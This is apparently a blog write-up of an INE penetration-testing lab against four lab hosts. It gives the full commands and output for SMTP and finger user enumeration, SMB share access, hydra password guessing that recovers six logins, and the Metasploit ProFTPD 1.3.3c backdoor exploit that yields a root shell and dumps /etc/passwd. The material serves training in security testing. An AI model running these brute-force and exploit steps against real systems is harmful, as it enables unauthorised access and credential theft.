February 4, 2022 | 16:04

INE Lab - Linux Remote Exploitation

The scenario is described as follows:

In this lab environment, the user will access a Kali GUI instance. A vulnerable application can be accessed using the tools installed on Kali on:

Dictionaries to use:

  • /usr/share/metasploit-framework/data/wordlists/common_users.txt
  • /usr/share/metasploit-framework/data/wordlists/unix_users.txt

demo.ine.local

TCP port 25 (SMTP) is open:

root@INE:~# nmap -vv -p- -T4 demo.ine.local
[...]
PORT   STATE SERVICE REASON
25/tcp open  smtp    syn-ack ttl 64
MAC Address: 02:42:C0:20:62:03 (Unknown)
[...]

We found a Postfix smtpd service with VRFY verb enabled:

root@INE:~# nmap -sV -sC -p25 -T4 demo.ine.local
[...]
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: demo.ine.local, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
MAC Address: 02:42:C0:20:62:03 (Unknown)
Service Info: Host: demo.ine.local
[...]

With that knowledge can enumerate users:

root@INE:~# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/common_users.txt -t demo.ine.local
[...]
demo.ine.local: administrator exists
demo.ine.local: demo exists
demo.ine.local: rooty exists
demo.ine.local: sysadmin exists
demo.ine.local: anon exists
demo.ine.local: auditor exists
demo.ine.local: diag exists
[...]
root@INE:~# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t demo.ine.local
[...]
demo.ine.local: anon exists
demo.ine.local: administrator exists
demo.ine.local: backup exists
demo.ine.local: bin exists
demo.ine.local: auditor exists
demo.ine.local: _apt exists
demo.ine.local: daemon exists
demo.ine.local: demo exists
demo.ine.local: games exists
demo.ine.local: gnats exists
demo.ine.local: diag exists
demo.ine.local: irc exists
demo.ine.local: lp exists
demo.ine.local: list exists
demo.ine.local: mail exists
demo.ine.local: man exists
demo.ine.local: news exists
demo.ine.local: nobody exists
demo.ine.local: postmaster exists
demo.ine.local: postfix exists
demo.ine.local: proxy exists
demo.ine.local: root exists
demo.ine.local: ROOT exists
demo.ine.local: rooty exists
demo.ine.local: sync exists
demo.ine.local: sys exists
demo.ine.local: sysadmin exists
demo.ine.local: uucp exists
demo.ine.local: www-data exists
[...]

demo2.ine.local

The machine has SMB-related services running:

root@INE:~# nmap -vv -p- -T4 demo2.ine.local
[...]
PORT    STATE SERVICE      REASON
139/tcp open  netbios-ssn  syn-ack ttl 64
445/tcp open  microsoft-ds syn-ack ttl 64
[...]

It’s a Samba server, very likely on Ubuntu:

root@INE:~# nmap -sV -sC -p139,445 -T4 demo2.ine.local
[...]
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: RECONLABS)
MAC Address: 02:42:C0:20:62:04 (Unknown)
Service Info: Host: SAMBA-RECON

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SAMBA-RECON, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-07-04T14:31:01
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: demo2
|   NetBIOS computer name: SAMBA-RECON\x00
|   Domain name: ine.local
|   FQDN: demo2.ine.local
|_  System time: 2022-07-04T14:31:01+00:00
[...]

We have read/write access on the public share:

root@INE:~# nmap --script smb-enum-shares demo2.ine.local
[...]
Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\192.32.98.4\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (samba.recon.lab)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.32.98.4\aisha: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\aisha
|     Anonymous access: <none>
|     Current user access: <none>
|   \\192.32.98.4\emma: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\emma
|     Anonymous access: <none>
|     Current user access: <none>
|   \\192.32.98.4\everyone: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\everyone
|     Anonymous access: <none>
|     Current user access: <none>
|   \\192.32.98.4\john: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\john
|     Anonymous access: <none>
|     Current user access: <none>
|   \\192.32.98.4\public: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\public
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

There is a flag on the public share:

root@INE:~# smbclient \\\\demo2.ine.local\\public
[...]
smb: \> ls
  .                                   D        0  Mon Jul  4 20:03:13 2022
  ..                                  D        0  Tue Nov 27 19:06:13 2018
  dev                                 D        0  Tue Nov 27 19:06:13 2018
  secret                              D        0  Tue Nov 27 19:06:13 2018
[...]
smb: \> cd dev
smb: \dev\> ls
  .                                   D        0  Tue Nov 27 19:06:13 2018
  ..                                  D        0  Mon Jul  4 20:03:13 2022
[...]
smb: \dev\> cd ..\secret
smb: \secret\> ls
  .                                   D        0  Tue Nov 27 19:06:13 2018
  ..                                  D        0  Mon Jul  4 20:03:13 2022
  flag                                N       33  Tue Nov 27 19:06:13 2018
[...]
smb: \secret\> more flag
03ddb97933e[...]

Enumerate users:

root@INE:~# enum4linux -U demo2.ine.local
[...]
 ================================ 
|    Users on demo2.ine.local    |
 ================================ 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: john     Name:   Desc: 
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elie     Name:   Desc: 
index: 0x3 RID: 0x3ec acb: 0x00000010 Account: aisha    Name:   Desc: 
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: shawn    Name:   Desc: 
index: 0x5 RID: 0x3eb acb: 0x00000010 Account: emma     Name:   Desc: 
index: 0x6 RID: 0x3ed acb: 0x00000010 Account: admin    Name:   Desc:
[...]

Password guessing:

root@INE:~# cat >> /tmp/users.txt
admin
john
elie
aisha
shawn
emma
^C
root@INE:~# hydra -L /tmp/users.txt -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt smb://demo2.ine.local -u
[...]
[445][smb] host: demo2.ine.local   login: admin   password: password
[445][smb] host: demo2.ine.local   login: elie   password: 123456
[445][smb] host: demo2.ine.local   login: aisha   password: monkey
[445][smb] host: demo2.ine.local   login: emma   password: abc123
[445][smb] host: demo2.ine.local   login: shawn   password: jennifer
[445][smb] host: demo2.ine.local   login: john   password: password1
1 of 1 target successfully completed, 6 valid passwords found
[...]

With the admin credentials, we have read/write access to each share:

root@INE:~# nmap --script smb-enum-shares --script-args smbusername=admin,smbpassword=password demo2.ine.local
[...]
Host script results:
| smb-enum-shares: 
|   account_used: admin
|   \\192.238.133.4\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (samba.recon.lab)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.238.133.4\aisha: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\aisha
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\192.238.133.4\emma: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\emma
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\192.238.133.4\everyone: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\everyone
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\192.238.133.4\john: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\john
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\192.238.133.4\public: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\public
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
[...] 

demo3.ine.local

The target has TCP port 79 open:

root@INE:~# nmap -vv -p- -T4 demo3.ine.local
[...]
PORT   STATE SERVICE REASON
79/tcp open  finger  syn-ack ttl 64
[...]

It’s a Linux fingerd service:

root@INE:~# nmap -sC -sV -p79 demo3.ine.local
[...]
PORT   STATE SERVICE VERSION
79/tcp open  finger  Linux fingerd
|_finger: No one logged on.\x0D
[...]

A quick manual check reveals, that there is a root user:

root@INE:~# finger root@demo3.ine.local
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.

There are more users, some with flags:

root@INE:~# for name in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do finger $name@demo3.ine.local | grep -i flag; done
Login: diag                             Name: Flag2 F765F7A0A169F4F6654EE72A84A9EB
Login: gopher                           Name: Flag1 098F6BCD4621D373CADE4E832627B4F6
Login: webmaster                        Name: Flag3 C4CA4238A0B923820DCC509A6F75849B

demo4.ine.local

There is a ProFTPD version 1.3.3c running on demo4.ine.local:

root@INE:~# nmap -vv -p- -T4 demo4.ine.local
[...]
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
[...]
root@INE:~# nmap -sC -sV -p21 -T4 demo4.ine.local
[...]
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
MAC Address: 02:42:C0:EE:85:06 (Unknown)
Service Info: OS: Unix
[...]

The server has an exploitable RCE:

msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts demo4.ine.local
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/bind_perl
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

We can see the users:

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Aftermath

In this section, I’ll state the approaches that differs within the solution walkthrough.

Overall Scanning

Okay, we could have scanned all them targets at once:

root@INE:~# cat >> targets
demo.ine.local
demo2.ine.local
demo3.ine.local
demo4.ine.local
^C
root@INE:~# nmap -iL targets --open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-05 21:44 IST
Nmap scan report for demo.ine.local (192.238.133.3)
Host is up (0.0000090s latency).
rDNS record for 192.238.133.3: target-1
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
25/tcp open  smtp
MAC Address: 02:42:C0:EE:85:03 (Unknown)

Nmap scan report for demo2.ine.local (192.238.133.4)
Host is up (0.0000090s latency).
rDNS record for 192.238.133.4: target-2
Not shown: 998 closed tcp ports (reset)
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 02:42:C0:EE:85:04 (Unknown)

Nmap scan report for demo3.ine.local (192.238.133.5)
Host is up (0.0000090s latency).
rDNS record for 192.238.133.5: target-3
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
79/tcp open  finger
MAC Address: 02:42:C0:EE:85:05 (Unknown)

Nmap scan report for demo4.ine.local (192.238.133.6)
Host is up (0.0000090s latency).
rDNS record for 192.238.133.6: target-4
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
MAC Address: 02:42:C0:EE:85:06 (Unknown)

Nmap done: 4 IP addresses (4 hosts up) scanned in 0.30 seconds

demo.ine.local

Metasploit can also be used to enumerate users on the SMTP server:

msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set rhosts demo.ine.local
msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit

demo2.ine.local

As an alternative to nmap’s smb-enum-shares script, smbmap can be used to list the available shares with permissions:

root@INE:~# smbmap -H demo2.ine.local
[+] Guest session       IP: demo2.ine.local:445 Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        public                                                  READ, WRITE
        john                                                    NO ACCESS
        aisha                                                   NO ACCESS
        emma                                                    NO ACCESS
        everyone                                                NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (samba.recon.lab)

While nmap lists the shares as READ/WRITE for the user admin, smbmap lists them as READ ONLY:

root@INE:~# smbmap -H demo2.ine.local -u admin -p password
[+] IP: demo2.ine.local:445     Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        public                                                  READ, WRITE
        john                                                    READ ONLY
        aisha                                                   READ ONLY
        emma                                                    READ ONLY
        everyone                                                READ, WRITE
        IPC$                                                    NO ACCESS       IPC Service (samba.recon.lab)

Actually, it’s READ ONLY:

root@INE:~# smbclient //demo2.ine.local/john --user=admin%password
[...]
smb: \> put test.txt 
NT_STATUS_ACCESS_DENIED opening remote file \test.txt

Furthermore, rpcclient can also be used to enumerate the target:

root@INE:~# rpcclient -U "" -N demo2.ine.local
rpcclient $> enumdomusers
user:[john] rid:[0x3e8]
user:[elie] rid:[0x3ea]
user:[aisha] rid:[0x3ec]
user:[shawn] rid:[0x3e9]
user:[emma] rid:[0x3eb]
user:[admin] rid:[0x3ed]
rpcclient $> enumdomgroups
group:[Maintainer] rid:[0x3ee]
group:[Reserved] rid:[0x3ef]
rpcclient $> enumdomains
name:[SAMBA-RECON] idx:[0x0]
name:[Builtin] idx:[0x1]
rpcclient $> queryuser john
        User Name   :   john
        Full Name   :
        Home Drive  :   \\samba-recon\john
        Dir Drive   :
        Profile Path:   \\samba-recon\john\profile
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Thu, 01 Jan 1970 05:30:00 IST
        Logoff Time              :      Wed, 06 Feb 2036 20:36:39 IST
        Kickoff Time             :      Wed, 06 Feb 2036 20:36:39 IST
        Password last set Time   :      Tue, 27 Nov 2018 19:06:12 IST
        Password can change Time :      Tue, 27 Nov 2018 19:06:12 IST
        Password must change Time:      Thu, 14 Sep 30828 08:18:05 IST
        unknown_2[0..31]...
        user_rid :      0x3e8
        group_rid:      0x201
        acb_info :      0x00000010
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...

demo3.ine.local

There’s also a Metasploit module that enumerates users via the Finger service:

msf6 > use auxiliary/scanner/finger/finger_users
msf6 auxiliary(scanner/finger/finger_users) > set rhosts demo3.ine.local
msf6 auxiliary(scanner/finger/finger_users) > exploit

And there is another way, through the finger-user-enum.pl script:

root@INE:~/Desktop/tools/finger-user-enum# ./finger-user-enum.pl -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t demo3.ine.local -v | grep -i flag | sed 's/\t\t*/\n/g'
diag@demo3.ine.local: Login: diag           
Name: Flag2 F765F7A0A169F4F6654EE72A84A9EB..Directory: /home/diag               
Shell: /bin/bash..Office: 353, 567-537-1198
Home Phone: 410-364-2969..Never logged in...No mail...No Plan...
gopher@demo3.ine.local: Login: gopher         
Name: Flag1 098F6BCD4621D373CADE4E832627B4F6..Directory: /home/gopher             
Shell: /bin/bash..Office: 5423, 954-540-8052
Home Phone: 423-553-2085..Never logged in...No mail...No Plan...
webmaster@demo3.ine.local: Login: webmaster      
Name: Flag3 C4CA4238A0B923820DCC509A6F75849B..Directory: /home/webmaster          
Shell: /bin/bash..Office: 65, 318-240-8507
Home Phone: 608-848-1401..Never logged in...No mail...No Plan...

demo4.ine.local

The solution walkthrough makes use of nmap to discover the vulnerability. The script also executes the id command:

root@INE:~# nmap --script vuln -p21 demo4.ine.local
[...]
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-proftpd-backdoor: 
|   This installation has been backdoored.
|   Command: id
|_  Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
[...]
``

© Pavel Pi 2021

Powered by Hugo & Kiss'Em.